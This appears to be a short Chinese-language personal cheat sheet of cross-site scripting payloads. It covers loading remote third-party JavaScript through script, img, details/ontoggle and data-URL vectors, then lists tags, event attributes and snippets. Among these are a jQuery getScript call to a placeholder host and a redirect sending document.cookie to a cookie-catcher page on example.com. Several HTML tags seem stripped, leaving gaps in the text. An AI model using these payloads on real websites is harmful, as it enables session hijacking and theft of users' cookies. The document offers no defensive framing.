xss加载远程第三方js

没有调用远程平台，用web接收cookie

简单的script链接远程第三方js，省略协议，浏览器自动加载当前页面的协议

img图片

图片创建script节点，链接远程第三方JS

图片创建其他节点，接收cookie

details+ontoggle展开

details详细信息展开时触发，往往是被忽略的一个点

123

data url

生成base64解码内容
TIP：刚开始用的时候，页面加载的是经过urlencode的script标签，无法解析；经过同事指点，是生成base64的网站自己加的url编码。再用站长之家，script生成的base64中有htmlencode。。最后找到了个正常的。
在线加密解密

标签还有 、（不允许加载js） (需点击) .....

直接调用

JQuery调用js

onmouseover=$.getScript("//xxx.xxx/a.js");

总结

总的来说，三个点。
标签、属性、事件代码。
标签

svg
input
object
iframe
img
甚至a pbutton等等都行。script直接运行js  

属性

onerror
onload
onmouseover
onmousemove
onmousedown
onclick
onfocus+autofocus
切换(具体忘了，回头查查)  

代码

console.log(document.cookie)
document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
prompt(document.cookie)
confirm(document.cookie)

以及上方加载远程代码的payload